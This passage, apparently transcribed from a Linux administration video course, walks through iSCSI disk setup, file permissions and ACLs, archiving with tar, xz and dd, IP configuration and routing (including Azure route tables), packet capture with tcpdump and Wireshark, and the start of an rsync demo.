SCSI, and then if I pipe that to grep and look for iSCSI, notice that it knows that we're connected to an iSCSI disk somewhere over the network. So now if I run sudo fdisk -l and press Enter, our 10 gig, or really it's 9.91, but close enough, our 10 gig iSCSI disk shows up to Linux, to the kernel, as being a device locally called /dev/sde. Well, at this point, it's business as usual. You just partition it, format it, and mount it, and you're ready to go. Let's do it. sudo fdisk /dev/sde. Okay, perfect. N for new, partition, P for primary. I'll just press Enter to accept the defaults for the partition number and the sectors. And I'll press W to write that out to disk. And then I'll run sudo mkfs make file system -type ext4 for /dev/sde1. All right, and then I'll run sudo make dir mkdir on the root. For the sake of clarity in this demo, let's just call the directory that we're creating on the root iSCSI, and let's do a sudo mount of dev sde1 into /iSCSI. So now if we do an sudo mount, let's say we just pipe that to grep, look for iSCSI, we can verify indeed that the file system is mounted. So to the Linux kernel, the network storage actually just appears to be local storage, even though really it's being accessed over the network. In this demonstration, I will be managing standard Linux file system permissions. Managing file system permissions is important to understand at the command line level. You can manage file system permissions using the GUI. For example, here in Ubuntu Desktop, and it doesn't have to be Ubuntu, it could be any Linux distro with a GUI environment installed on it. But if I were to go into my Files icon on the left, and again, the specific area you would click, the way the GUI would look, it will vary from one desktop GUI environment to another. But the concepts remain the same. If I were to open, let's say, documents, currently we have nothing in it. Let's create a sample document. So maybe on the left, I'll go into LibreOffice Writer. I'll just type in some sample text. This is a sample document, and I'll save it in my local documents folder, which of course is in my home directory. I'll call it sample document 1. I'll click save. So now in the documents folder, we've got sample document 1. I can right-click on a document or a directory for that matter here in the GUI. I can go to properties, and from here, I can set permissions. The owner is showing as me, my current signed-in user, where I could determine what access is allowed, whether it's read-only or read and write. Because remember, there are 3 sets of standard Linux file system permissions. There's the owning user, there's the owning group, which we can change from the drop-down list and set permissions for members of that group. And then there's others, everybody else, where we could set the access to none, read-only, read and write. And we could also determine if we want to allow execute permissions. Now that's using the GUI. Let's go back to the command line. Back here at the command line, if I do an ls in the user's home directory, there's nothing here. Now this is on a different machine. This is not a desktop GUI Ubuntu Linux installation, rather it's a server installation. So here I'm going to make a directory, and I will call it budgets. And I will change directory into budgets, and I will create a file, let's say, using the touch command called budget1.txt. If I clear the screen and do an ls, there's budget1.txt. The first thing about permissions is, what are the defaults? We haven't set it yet, we just created a file. If I run ls-l, a long listing, for budget1.txt, we've got read and write, shown here for the owning user, read and write, shown for the owning group, and only read for everyone else. If I type umask, I get 0002. Well, let's forget about the leading 0, let's think about the 002. The Linux kernel wants to assign read and write permissions to everything by default. So that's R and W, which is a value of 6, because read is 4, W is 2. So the second 0 here applies to the owning user. In other words, which permissions do we want to take away? 0. Okay, so then read and write is applicable for the owning user. The next 0 after that, same thing. Read and write is applicable then by default from the owning group. But then we have a 2. We're taking away the 2. Well, we know that read is 4, write is 2, so we're taking away the write permission that the kernel assigns by default, which leaves us only with read. That's where the default permissions kick in, but let's change it. So let's say we want to run change mode chmod 740 budget1.txt. The 7 would be 4 plus 2 plus 1, that's read, write, and execute for the owning user shown above. The 4 means we want to have read for the owning group, and the 0 means no permissions for other. If we were to apply that by pressing enter and then do an ls-l, or you can just use the ll command, it's another way to do that. For budget1.txt, notice that we've got read, write, execute, which is our 7. We've got read, which is our 4, and then we've got 0 for everyone else. Because it's executable, in Ubuntu Linux it shows up green. We can also set permissions using this type of syntax. Let's say change mode user equals read write RW, comma, group equals read write RW, comma, and maybe O plus R. Notice we can use equals to overwrite the current setting. We can also use the plus and minus to add or remove individual permissions. Then, of course, we specify the subject, in this case, budget1.txt. If we do a long listing, now the user has read and write. Same with the owning group, read and write, and other has read. I'm going to use the sudo group add command to add a group called East Admins. So I could use the sudo command, change group for the East Admins group, applied to, let's say, budget1.txt. I've changed the group. If I do a long listing, notice that for budget1, East Admins is now shown as the owning group. Therefore, the permissions for the owning group, which in this case are read and write, apply to whoever is a member of East Admins. Let's say I were to run sudo user add mbishop, and maybe I'll run sudo user mod mbishop lowercase g East Admins to add them to that group. Now mbishop would have read and write to the budget1.txt file. Now we can also change user ownership. Let's add an additional user here, sudo user add lbrenner. I could then use the sudo change owner, chown, lbrenner, for the file, let's say budget1.txt. If I do a long listing, notice that Lucas Brenner is now the owner of budget1.txt. And so, of course, user Lucas Brenner will now enjoy the permissions assigned for whoever the owner is, which in this case works out to be read and write. Let's take a few minutes and let's experiment with extended ACL Linux file system permissions. Here on my Ubuntu server, if I were to type ls, I've got a budgets folder in my home directory. Let's go into it, because in here, I have a file called budget1.txt. If I type ll for long listing, we get a listing of the budget1 file as well as the parent directory and the current directory, but the budget1.txt file shows the owning user, here L. Brenner, the owning group, here EastAdmins. So L. Brenner would get the read and write permissions set for the owner. The members of the EastAdmins group would get read and write set for the owning group, and anybody else would have read. Now that's fine, but there are a couple of glaring problems with this. One of which is, how do I assign different specific permission sets for different users and different groups? Well, with standard Linux permissions, otherwise called POSIX compliant permissions, this is a limitation, and it stems way back many decades ago. However, if you need some more advanced features, such as the ability to assign different permission sets for different users and groups, that's where extended ACLs come in as being useful. If I were to run get ACL, actually I'll just run that by itself and press enter, because it comes back and says, first of all, did you mean get FACL, get the file ACL? Well, yes, I actually did mean to type that in. Well, let's see what it says. Get FACL. It says can't be found, but you can install it with sudo apt install ACL. So the get FACL and the set FACL commands are unavailable. So if I type set FACL, we get the same message. So let's go ahead and install that. sudo apt install ACL. Some Linux distros will have these commands built in automatically. Obviously, this version of Ubuntu server did not. If I were now, let's just run get facl against budget1.txt, it'll return what we can already see with the long listing command up above. The owner being L. Brenner, the group being EastAdmins, and then the permissions for the owning user and group and other. Okay, so there's nothing new there yet, but we haven't yet manipulated the ACL for that file, the access control list. Let's clear the screen. I'm going to run set facl, and I'm going to use -m because I want to modify the file ACL. U for user, : I know I have a user on this server by the name of M. Bishop. I'm going to specify that name. And I'm going to set : RW, read and write. I could specify X for execute if I wanted to. And then I'll specify, after a space, the name of the subject to which that should be applied. In this case, budget1.txt. Enter. Now I get an operation not permitted because when you start modifying some of these things, you should make sure that you are using the sudo prefix to run it with elevated privileges. And of course, it works fine after that. If I type ll for long listing, notice that with the traditional long listing and the standard Linux permissions, we do not have a reference to M. Bishop. But do you notice this little plus sign here? There's some additional stuff that's been set here, which means an ACL. If I run get facl against budget1.txt, well, this is interesting now. Besides the standard items that we saw previously, what's new, of course, is user mbishop is listed as a separate entry in the ACL for that file, having read and write permissions. And they don't have to have the same permissions as the owning user, which happens to be read and write also in this case. So if I were to run sudo set facl u : I have another user on this system by the name of L. Brenner, : let's say just read for budget1.txt. So let's say I were to run sudo set facl -m for modify, u for user. I know I've got another user on this system called L. Brenner, : R, let's say just read permissions for budget1.txt. Enter. Now we run get facl against budget1.txt. Now we have an additional user added to that same file's ACL with totally different permissions. That's one of the benefits of using these ACLs. But you can do the same thing for groups. Here we've got an entry for group, read and write. That maps to, if I type LL, the owning group, EastAdmins. Okay, but what if I have a different group that needs different permissions to that file? By the way, this could also be done for a subdirectory. We're just doing it on a file in this example. First thing I'll do here is add a new group. sudo group add westadmins. Okay, now what I want to do is set facl -m modify g this time for group, of course, not u for user, : westadmins, : R for read, let's say, for budget1.txt. Now we know we're going to have to prefix that with sudo to run it with elevated permissions and then enter. If we now once again run get facl against budget1.txt, there should be no surprise. We now have an additional group here with different permissions added to the ACL budget1.txt, West admins with permissions of read. In this demo, we're going to experiment with various methods of working with Linux compression and archiving through the use of different command line tools. The first thing we'll do here is just type pwd. I'm in my home directory and in a project's subdirectory that I've created where I have a number of project files. They're just sample files. If I were to run cat asterisk to see the contents of all of them, they all contain the same thing. It just says this is a sample project file. And if I were to do an ll, a long listing, the files, of course, are very tiny, but that's going to be what we're going to work with when it comes to some of these commands. Let's start by working with the tar command to create a compressed archive. To do that, I'll run sudo tar-c for create. I want to create an archive. Now, if I want to compress it with gzip, I would then specify lowercase z as a parameter, v for verbose if I want to see output of what it's doing, and then f for the file. I want to call this projects_backup.tar.gz. That's the convention when something is archived and compressed with gzip, although you don't have to use those extensions, but it is normal. Then we have to tell it the source. In this case, I'll put /current directory asterisk, and I'll press enter. Because we used the -v, the verbose parameter, it spit back out on the screen here all of the project files that it added to the compressed archive. So if we were to do an ls in the current directory, notice we've got a file shown here with red lettering in Ubuntu Linux because it's a compressed archive. It's our projects backup.tar.gz. Now we have a way that we can list what's in the archive without even extracting it. We can do that with sudo tar-t for listing, then f for the file, and I give it the file name. So I'll put in the file name here and enter. What it does is it shows me what's inside that archive, and what it's showing me, of course, are my 5 sample project text files. Let's go ahead and just remove all of the text files in the current directory, rm*.txt. We'll clear the screen, we'll do an ls, so those files are gone. We're going to extract our archived gzip file to get those files back. We can do that with sudo tar. Now, depending on where you're doing this in the file system, will determine whether or not you really need to use sudo. We'll just use it anyhow. In this case, -z, it's compressed, x for extract, v, verbose, and f for file. We just give it the name of the file. Enter. So there's the verbose output, but if I clear the screen and do an ls, the project files are back. Now, the tar command has many command line parameters. We could view that with man tar to view the man page, where you might choose to append to an existing archive, or you might extract it to a directory other than the current directory, and many more possibilities. I'll press Q to quit out of that. If I were to type sudo mount and pipe that to grep and look for device SDB, we've got a mount point called data1, and it's pointing to /dev/SDB1. So what I can do is I can take a backup image of an entire disk partition using the dd command. So for example, sudo dd if for input file equals /dev/SDB1, and then of for output file equals, and let's put that on the root of the file system. Let's call it sdb1.img, enter. Depending on how big that partition is and how full it is will determine how long this operation will take. Okay, so it looks like it's created our image file for our partition. If we go to the root of the file system and do an ls, here we'll have our sdb1.image. If I do an ll against that file, notice it's a rather large file because it's a copy of an entire disk partition. Now, not only can you use dd to create an image, but you can also apply it to a partition if you need to. So normally you would store these files on some kind of backup media, whether it's removable USB drives or actual tape drives. Let's clear the screen and let's go back to the home directory by typing cd and pressing enter. And if we do an ls, we see that we've got our projects directory. Let's go back into projects again and do an ls in there. Let's take a look at how we would compress using the xz command line tool. If I just type sudo xz, it knows what I'm talking about. With some Linux distributions, if it doesn't, you'll have to install the package. So in this case, sudo xz, I'll use -v for verbose, and I'm simply going to tell it *.txt. Of course, it will assume the current subdirectory. Okay, so it's listed for each of the 5 sample project files, the compression status, so 100%. If we clear the screen and do an ll, the files are shown here, but with a .xz file extension. So it actually replaced the source text files. Now, if I want to decompress one, I could use xz dash lowercase d, and then specify the file. Why don't we do project A here? And now if we do an LL long listing, notice we have project underscore a.txt. Now, when you're dealing with very tiny files such as we are, you might not realize a benefit to using XZ to perform compression. So it really shines when you're using much larger files. In this demonstration, we're going to take a look at some Linux OS commands that we can use to manage network interfaces as well as IP addressing. Let's start with the ifconfig command. Now, in this case, I typed it in and it worked. If it's not installed, you might have to run, for example, here in Ubuntu Linux, sudo apt install and then specify the package such as ifconfig, or it might be a network utilities package to get it installed. However, we don't have to do that here. When I type ifconfig, interface config, notice that it's returning back two network interfaces in my particular case. One is called ENS33, that's my local Ethernet interface, and I have one here called LO, that's my local loopback. It will always have a local loopback IPv4 address of 127.0.0.1, where the equivalence in IPv6 is ::1. Loopback testing can be conducted just to verify that the TCP IP stack is working on the local machine, or to test things like a local website you might be running on a local web server as a developer. However, notice for our Ethernet interface, we've got an IPv4 address shown here, and the decimal representation of the subnet mask, in this case 255.255.255.0, and we've got the IPv6 address shown here as well. Notice the IPv6 address here starts with FE80. That's called a link local address. It's used internally by IPv6 for communication and to discover other devices on the network, so that if you actually assigned your own unique IPv6 address, that would show up here in addition to the link local address that has a prefix of FE80. Notice here it says prefix len, that would be the network. Prefix length is 64 bits, so /64. ifconfig also shows the MAC address, the 48-bit hexadecimal address. ifconfig also shows the 48-bit hexadecimal MAC address that uniquely identifies that network interface. And then we're going to have some statistics like the number of received versus transmitted packets and any errors related to that. So clearly ifconfig is a valuable command. I could also run sudo ifconfig, in our case ENS33 up, if I wanted to bring the interface up, or down if I wanted to bring it down. Naturally, if you're connected through a remote network SSH connection and you bring the network interface down, that could be a problem, because how would you get back to it if it doesn't have another network interface, or if it's not a virtual machine whose host you have access to? Now we can also run the IPA command for IP address, which gives us a listing showing us our local loopback address. For that local loopback interface LO, our network interface of ENS33 with our IPv4 information along with our MAC address, and also the IPv6 addressing information for that interface. Now we could use, for example, ifconfig, or in this case, IPA add, and we could give it an IP address along with the /CIDR subnet mask, let's say 24, specify a device, and we could assign a device to an interface in that manner. But it's not persistent. If you reboot, that configuration is gone. So where do we go to configure persistent network settings? And that will vary a little bit between different Linux distributions. Here in Ubuntu Linux, if I change directory to /etc/netplan and then do an ls, I've got a config file here. I'm going to use sudo nano to open up that config file. Now this network config file, notice, has a number of directives, and for readability, a lot of the directives are indented where they should be, and each directive has a colon after it. So we've got network, Ethernets. Here's our interface, ENS33. Notice that it's set to use DHCP v4. It's been set with the value of true. If we wanted to configure a static IP, and I've got this here shown in WordPad, then we could set DHCP4 to a value of no or false. We could specify the IP address using the addresses :syntax and put it in square brackets in CIDR notation. We could configure the default gateway address, and under the name servers section, we could add the addresses for one or more DNS servers for name resolution. If you make a change to that, you would then run the sudo netplan apply command instead of rebooting to put those settings into effect. Now, of course, you have a number of other commands related to networking that you might run here in Linux, such as ping. So if I ping a given IP address, it'll ping it using the ICMP network transport mechanism, and if it's there and ICMP is not blocked by firewalls, I'll get a response. Now, unlike Windows, which only does this 4 times and then stops, you would have to press Control-C to get this to stop pinging. All that pinging is telling you is that there's something out there listening at that IP. But in reality, a lot of ping type of traffic is blocked by firewalls these days. You can also use traceroute, where you could specify the path that you are taking from your local machine to get to the listed destination. Now again, if the firewalls between you and the target are blocking ICMP traffic, you might not get information reported back. Here we have a few references here for internet providers that are being specified all the way up to the target for 8.8.8.8 in my example, which is just DNS.Google, so Google DNS servers. You might also find it useful to use commands like netstat. If I just press netstat with nothing, it returns all of the socket connections, whether it's incoming to this machine, if it's a server, maybe hosting a website, or if this machine is connected elsewhere. So if I were to use netstat, let's say, and pipe that to grep and look for SSH, it returns back that SSH indeed is shown here with an established connection from this client 192.168.2.11 on the higher side client port of 39,806. Of course, the server itself is listening on TCP port 22. So these are a handful of commands that can be very handy in managing networking in a Linux environment. In this demonstration, I will be configuring routing within the Linux OS. So we know that routing means that we can control how traffic gets sent to reach a target destination outside of the local area network. And we know that every client endpoint device has its own routing table configuration. We can view that routing table here in Linux simply by typing route or by typing IP route show. For example, with the output of IP route show, we see that the default route is via 192.168.2.1. That is the IP address of our router interface on our local area network. Now we can get to that from this Linux host's perspective by going out of device ENS33. And this machine is configured currently for DHCP. So our address is 192.168.2.41, and that has a metric of 100. The metric can be used relative to other metrics to determine the least cost, so to speak, route to a target. Now we could add a route to the routing table. There might be times, for example, in some networks where you have more than one router connected to the network, and you might want to direct certain types of traffic through that router. You still might want to have a default gateway for normal traffic, but if you're trying to connect to something on a specific target network, send it through a different exit doorway, so to speak, to get to the remote target network. Let's say, for instance, we ran sudo IP route add. We want to be able to send traffic from this machine to the 200.1.1 network, so 0/24 bits in the mask. But we want to do that via or by going through a default gateway connected to our local area network. So it has to be reachable on the LAN from this host's perspective. So I'll put in the IP address of that. And finally, if you want to specify the interface, especially if you have more than one, you can with dev. So I'll go ahead and do that. So we've got a new route added so that any traffic from this machine destined for 200.1.1. something, it's going to be sent out to 192.168.2.90, which in our example is our default gateway. If I were to run IP route show yet again, notice here 200.1.1.0.24 via, and there's our local router on our network. You can have more than one. That's where the traffic would be sent. Now, of course, you can also remove that entry. I could run sudo IP route delete 200.1.1.0. Enter. Now, of course, you could also remove that entry from the routing table by running sudo IP route delete 200.1.1.0/24, enter. So now if we run IP route show, it's no longer shown in the list. Now, while this is great to understand, and there are some special use cases where you will want to statically manipulate routing tables on Linux hosts, it's possible. It's not common. But not only can this be very relevant for configuring Linux hosts, but it can also be very relevant when you're troubleshooting them. If there's been some kind of a problem with the configuration and a given Linux host might not be able to communicate outside of the local area network. Now that's fine if you want to modify the routing table on this Linux host and have it in effect only in this session while the machine's running. What if we restart? All that routing information is lost. So what we can do is we can modify the appropriate config file. Let's change directory to /etc/netplan. If I do an ls, there's my config file. I'll run sudo nano against that config file to open it up. And what I'll do is add this routes section down here. I just added routes, colon, on the next line, dash space 2, as in TO, colon, space, the target network I want to create a route for, using CIDR notation for the net mask, here's /24, and on the next line, via, colon, so what is the IP of the router that I will send traffic to reach my target network? One thing about using these NetPlan network config files, they use YAML, which is a markup language type, but they are very particular about how things are indented, and you can't use tabs. You might be used to using tabs for proper indentation in a word processor. That's fine in a word processor. It's not fine here. It's going to break your NetPlan network config file. Believe it or not, use spaces to line these things up correctly. For example, the word via needs to start directly under 2. You can't add an extra space or remove one and expect it to work right because it won't. Okay, so I'm going to close that out and save that change. And to put that into effect, I can run sudo netplan apply. After which, if I now run, once again, IP route show, we now have our route here that's been read from our NetPlan configuration file. So to make route entries, manual entries, persistent between reboots, modify the appropriate NetPlan file, but watch out for the syntax in terms of using the spacebar for the space versus tab. Tab is good, spacebar. Tab is bad, spacebar is good. In this demonstration, I'll be configuring Linux routing in the cloud. Specifically, I'll actually be configuring routing in the cloud that can be used by Linux virtual machines as well as other types of operating systems. The first thing I'll do here in Microsoft Azure, where I've signed into the portal, is I will take a peek at the virtual machines view. Now, if the left-hand navigator isn't open, I can just go ahead and open it, and I can click down on Virtual Machines on the left. I've got one virtual machine here called Ubuntu One. What I want to do is open it up, go into its settings, and check out what network it's connected to in the cloud. So I'm going to click on the name of the virtual machine to open up its properties. And in the left-hand navigator, go down under Settings, and I'm going to click Networking. Over on the right, I then have a listing for the virtual network and subnet that this virtual machine belongs to. So it's in a VNet, a virtual network in the cloud, Ubuntu One VNet, and within that, it's connected to the default subnet. If I click on that link to open up that VNet, I can then click subnets in the left-hand navigator of its properties, and there's the default subnet with its IPv4 address range. So therefore, that Ubuntu Linux virtual machine will receive an IP configuration within that range. But here's what's interesting. If I click on the name of the default subnet here to open up its properties, notice one of the things we can associate with a subnet in the Microsoft Azure cloud is a route table. Currently, it says none, and there's nothing selectable from the list. So a route table is just another cloud resource. It's like creating a storage account or a virtual machine or something like that. It's another item or object you create in the Azure cloud that you can then, in this case, associate with a subnet. Within the route table, of course, you would have your routes to control where traffic gets routed to and through what. So what this means then is I'll cancel that. I'm going to go home where I'll click Create a Resource, and I'll search for route table, and I'll select it from the list. And then for Microsoft Route Table, I will click right on it and then click the Create button. As is the case when I deploy anything in the Azure cloud, I have to associate this with a resource group, just a way to organize resources. I'll choose HQ, for example. I'm going to create this in the East US region, and I'll call it East Route Table 1. Notice that the default is to propagate gateway routes. That's got a value of yes. That's only really useful if you've got a connection to an on-premises environment. Do you want the on-premises routes to be propagated here in the cloud, such as if you have a site-to-site VPN? So it really doesn't matter what I select for that in this case. I'll just click the Review and Create button in the bottom left, and I'll click Create. After a moment, the deployment is complete. I can choose to go to the resource to open up its properties. Of course, I can always go to the All Resources view, where the route table will also show up here and is selectable. So I'm going to click on it to open up its properties, because the key here is we can then click Routes on the left, and we can add multiple routes. It is a routing table after all. So maybe I'll call this route Send Outbound Traffic to FW for Firewall. Let's say we've got a firewall appliance deployed in the cloud, and we want to route traffic to it. For the destination type, I can specify an IP address or a service tag, which really refers to a type of service that is available here in the Microsoft Azure cloud. I'm going to choose IP addresses, and let's say we want to force all traffic through this. So therefore, for IPv4, we can refer to the default route to capture all traffic, unless there's another more specific route, by putting in 0.0.0.0/0. For the next hop type, I'm going to choose virtual appliance in this configuration, and I will put in the firewall's IP address. Now, firewalls are going to have at least two interfaces. You're looking at the internal firewall IP here. So let's say 10.0.0.100. And I'll click Add. Okay, so we've just added one route table entry for routing traffic into our route table object. So we would continue doing that as required. Maybe to control routing to on-premises networks through a VPN, or if we are linking VNets together here in the Azure cloud. However, that's all I'm going to do, but what I need to do now is go to subnets on the left and associate this with the subnets. I'll click the Associate button, and I'll make sure that this route table will be associated with the default subnet in the Ubuntu One VNet. I'll click OK, and it's done. So this is how we can begin to think about working with routing to control the movement of traffic in the Microsoft Azure cloud. So then if we were to go back, let's say, into our virtual network, back into the subnets on the left, and if we were to click the subnet, the default subnet on the right, now notice that the East Route Table 1 resource is associated with our default subnet. What this means is any virtual machines deployed into that subnet will use this route table. All of the routing table entries that we might add will be made visible to all virtual machines deployed in default. So in this case, that means all of the virtual machines in the default subnet will be routing traffic through a firewall appliance before it goes anywhere else on its way out to the internet. Yet another great command built into the Linux OS is TCP dump. This is a tool that lets us capture and analyze network traffic. And so it's a command line tool where we can specify various parameters to control the behavior of what kind of network traffic that we wish to capture through which network interface, and so on. Let's go ahead and let's take a look at how TCP dump works. So the first thing I'll do here in Linux is I'll run the IPA command. The reason I want to do this is because I want to know how many interfaces I have. Now, the only real network interface I have here that is active on a network is ENS33. And I can also see my IP address on that network, which in this case is 192.168.2.41. So the first thing I'll do is run sudo tcp dump -i for interface ENS33. I can also add -v for verbose output. And immediately it begins capturing network traffic. Now, of course, it's going by quite quickly. And it's even hard to tell what type of network traffic is going by, although I see many references to SSH flying by the screen really quickly. I'm going to press Control-C. And what we can also do is write that to a file. So why don't I repeat that exact same command using the up arrow key, except what I want to do is use the -w parameter to write this to a standard pcap file. I want to store it in the current directory, which is the user home directory that I'm signed in with. And I'm going to call this packetcapture1.pcap. And I'll press Enter. Okay, notice here, instead of getting the output on the screen as we did previously, instead it's being written to our packetcapture1.pcap file. It is telling us the number of packets that it's been able to capture, and the number keeps increasing on the screen. I'll press Control-C to quit out of that, and if I do an ls, sure enough, we've got a file here called packetcapture1.pcap. If I try to look at that with the cat command, it appears to be a binary encoded type of file, which is normal. It's not a text file. It's a pcap or a packet capture type of file. Now, I could use other tools like Wireshark to open that up, but I can also simply use TCP dump. So, sudo TCP dump, but this time I'll use a -r for read, and I'll specify that path and file name. I'll press Enter, and what I can now do is see the output that the command originally resulted in, but this time it's not flying by the screen like it was when we were just displaying the output on the screen. And I can go back out and take a look at what's happening. For example, I can see from my local host, Ubuntu Server 1, it looks like we've got SSH response traffic going back to a client, which is the one I am using here, at 192.168.2.11 on a higher side client port. Now, our Ubuntu server reference here uses .ssh notation, which means the standard SSH port, which of course is TCP port 22. But there really is so much more that you can do when it comes to using TCP dump. If you're familiar with capturing network traffic, then you're definitely familiar with the concept of capture filters. In other words, filtering out what you capture. Now, of course, you could always filter the output, but let's go ahead and work with a few examples of filtering what we capture in the first place. So for example, sudo TCP dump -interface ENS33, I can specify a host IP by using the host keyword and then specifying the IP address. So here I'll put in a particular host IP address. I'll put in -v. I still want the verbose output here on the screen. So now I'm only seeing traffic that includes 192.168.2.11. If I press Control-C to stop that, of course, I could also write that output with -w. Let's call the file host filter.pcap. Okay, and it's starting to capture traffic once again based on that. I'll press Control-C to stop it, and let's read that file in. So sudo TCP dump -r, specify our host filter pcap file, and notice within it, all we have is traffic related to host 192.168.2.11. Now, of course, you could use that read command line parameter and pipe the result to grep if you're looking for something specific. So let's say I grep for netBIOS. So now we only see the lines containing netBIOS that were captured within that pcap file. You can get more specific though with your filtering. So instead of just specifying that host, which would capture traffic to and from that host, we might want to specify that only traffic destined to that host should be captured. So we could use the DST keyword to do that. Let's press enter. So we're going to overwrite that same host filter pcap file. So notice it's capturing, but we only have a handful of packets so far. So we're paring it down. It's not showing as many packets that it's capturing because we've got a filter. We're more selective. Control-C. Let's clear the screen and let's read in that file again. Notice this time we don't see 192.168.2.11 on the left because we're not interested in traffic from it, only interested in traffic in our example going to 192.168.2.11. Now, of course, you could also filter by traffic type or port. For example, if I do an sudo TCP dump -interface ENS33 -v for verbose, let's say -n for the name of the protocol, let's say ICMP. Now, currently, there's no traffic. Why don't we go ahead and ping this host from another machine? And as soon as we do that, notice that we see all kinds of ICMP captured packets. Okay, so that's one way to filter that way as well. We can also capture on specific port numbers. So sudo TCP dump -interface -v for verbose, and then I'll just use the port keyword, not -port, just port. Let's say we want to see only port 22 traffic. So now that's the only type of traffic that we will be seeing in this capture. Now we've only just looked at the bare bones in using TCP dump. If you look at the manual page, man TCP dump, you'll see that there are many command line options, many filtering options, and so on. So this can be very handy for the Linux technician in determining what type of network traffic is out there or to help troubleshoot network communication problems. In this demonstration, I will be capturing and analyzing network traffic using Wireshark. Here I'm on the wireshark.org website. Wireshark is a free open source packet capturing and network analysis tool, and it runs on multiple platforms. So whether you're running it on Linux or the Mac OS or the Windows platform, it looks and feels the same. In this particular case, I have Wireshark running on a Windows host. Now, why is that relevant for a Linux technician? Well, a Linux technician can capture network traffic that would include Linux traffic from any platform, whether it's Mac OS, Linux, or Windows. The key is to solve problems on the network or also to audit what type of traffic is on the network and whether or not it should be there. So whether you run Wireshark from one platform or another is irrelevant. It looks and feels exactly the same. So here in Wireshark, where I've already installed it, I've got a Wi-Fi adapter available, and I notice I have some activity. To start a capturing session on that network interface, I would simply double-click. Each line here represents a separate captured packet. Now, we haven't created a capture filter, so it's capturing all network traffic that is visible to this particular machine. In a network switched environment like physical Ethernet switches, bear in mind that the only traffic you will see is traffic to or from your device, and that would include multicasts and broadcasts. So unless you connect to a switch port specifically configured so you could see all network traffic, you're not really getting the full picture. I'm going to go ahead and stop this packet capture by clicking the stop button in the upper left. If I were to select a single individual packet in the center of the screen, it presents us with the packet headers. The packet headers identify things like addressing information. For example, if I open up the Ethernet 2 header, we've got the source and we've got the destination MAC addresses. These are the 48-bit hexadecimal addresses that represent the network interfaces in question. After which, we have the IP header. Now, the Ethernet 2 header here would map to layer 2 of the OSI model, where that applies to MAC addresses, whereas the IP header would map to layer 3, the network layer of the OSI model. We've got a number of fields here, including the TTL, the time to live value, which specifies the maximum number of hops or routers through which this packet will go before it's discarded. And it's also, of course, got the source and destination IP address. Depending on the type of packet that you're looking at, will determine what the next header is. In this case, it's a TCP, Transmission Control Protocol type of packet. If I expand that, it's got a number of fields. Notably, what we're really interested in here are the source and the destination port numbers. The destination port is shown here as 443, which of course is normally used by web servers configured with HTTPS. So this is a client making a connection to that host. Down at the bottom, we've also got the hexadecimal representation on the left and the ASCII representation on the right of the packet payload. Sometimes you can make sense of what's happening there, other times not. Now, up in the display filter bar, we can also filter the traffic for anything that we specifically want to see. For example, if I type tcp.port == 443 and press enter, that is the only type of traffic that I'm going to see in this listing. So as I select my various packets, all of the port numbers in the TCP header are going to specifically show as being 443. We can simply delete that filter and type in something different. Now you can also go to File and save your packet capture for later analysis. I've already done that and opened up an FTP capture file. It includes other traffic as well. Now you can also filter on protocol just by typing, for example, FTP and pressing enter, and that's the only traffic I'm looking at. Of course, one of the things that we can use a network analyzer like this to do is to audit what's happening on the network. Notice that the username is shown in clear text here as administrator, and the password is also shown in clear text. FTP is one of those protocols that sends credentials in plain text or in the clear. And this is how easy it can be to retrieve those credentials if you're on the network at the right time and are able to see that type of traffic. I've opened up yet another packet capture file. Now, what's interesting about this is that if you're using the TCP dump command in Linux, you can use the lowercase -w command line parameter to write what you capture out to a pcap file, which you can then open in Wireshark, whether you're running Wireshark on Linux or running it on Windows. Now, another important aspect of working with the packet capture here in Wireshark is that you can select a given packet within a conversation, and you can go to the Analyze menu and choose Follow, in this case, TCP stream, because I've selected a TCP packet. Now, instead of having to piece together what's happening in the session across a multitude of packets, this makes it a little bit easier to look at. For example, it appears that we've captured Telnet traffic for remote Telnet command line management, where the login name is shown here, as well as the password, and we can even see the commands that were issued to the point where they logged out of the session. Telnet, again, is one of those notorious network protocols that sends credentials in clear text. If we were to keep that packet selected and go down to the TCP header, notice the source port is 23, and 23, in fact, is the default port number used by Telnet servers that allow remote connections. Now, instead of using Telnet for remote management at the command line, of course, we should be using Secure Shell or SSH, which provides an encrypted connection. But what's really important is that we have a sense of how we can capture network traffic, whether directly in Wireshark or with TCP dump, and then have a way to analyze and make sense of the packet capture within Wireshark. In this demonstration, we're going to take a look at how you would copy and synchronize files between Linux hosts using rsync. The first thing we'll do here is check out what we've got on an Ubuntu server called Ubuntu 2. If I were to type pwd for print working directory, it shows that I am in /home/cblackwell. If I type in ls here, I've got a projects folder. If we take a look at what's in there, we've just got a couple of sample project files. Now, what we're going to be doing is using rsync to pull these files to another Linux host for backup purposes. In our example, we're just going to do this from the perspective of an Ubuntu desktop, a client computer. It could just as well be reversed. One thing that's important is to take a quick peek at the man page for rsync. So man rsync, and way down under option summary, we get a list of some of the command line parameters that can be very important. So we can use either --verbose or just --phi, get a verbose listing of what is being copied and synchronized. We can use -a for archive mode, -r to recursively go into subdirectories. And notice that we also have options such as -H to preserve hard links, -p to preserve permissions. So you're not just bringing over the file data, you can also bring over the metadata for it in terms of things like permissions. If you're also using extended ACLs for file system permissions, you can preserve those and make sure they're backed up or copied by specifying -A on the command line. And -O to preserve the owner of the file, -G to preserve the group ownership, and so on. So clearly there are many, many options available with rsync. There are plenty of command line parameters. Okay, I'm going to type Q to get out of the man page, and here on the server I'll type IP space A so we can get a sense of what the IP address is. Here it is. The server's IP address is 192.168.2.42. And if I were to type sudo service SSHD status, it shows that the SSH daemon is up and running. It's active and running on this machine. Making an rsync connection over the network uses SSH. So here on Ubuntu desktop, a different computer over the network, I'm going to go ahead and start a terminal session. I'll just maximize it, and I'll just click to increase the size. From my desktop, I'll just go ahead and make sure I can talk to the server by pinging it, ping 192.168.2.42. And we're getting a reply back, so that's good. Now mind you, you have to think about the firewalls between the two systems that will communicate using rsync. In this day and age, the reality is that a lot of ping traffic is blocked, so you can't always rely on that to test connectivity. You might try to SSH into the server to see if that works, since that's what you're going to be using anyways. Here on the client, if I were to type IPA, notice the client IP address is 192.168.2.40. So from the server, if I were to try to attempt an SSH connection using the SSH command line tool, cblackwell at 192.168.2.40, we get an immediate statement about the connection being refused because there's no SSH daemon running on that host, which means that rsync would fail in this direction from the server reaching out to the client unless an SSH daemon was configured. Back on the client, here we go. What we're going to do is run the following command. rsync cblackwell, I know this is a user on the target server, and I'll specify the IP of the target server. In this case, it's 192.168.2.42, colon. Now on that server in the file system, I want to go into /home/cblackwell. So basically, I will be copying and synchronizing files in that user's home directory from the server onto this Ubuntu desktop. I'll specify command line parameters like -a for archive, R for recursive to go through all the 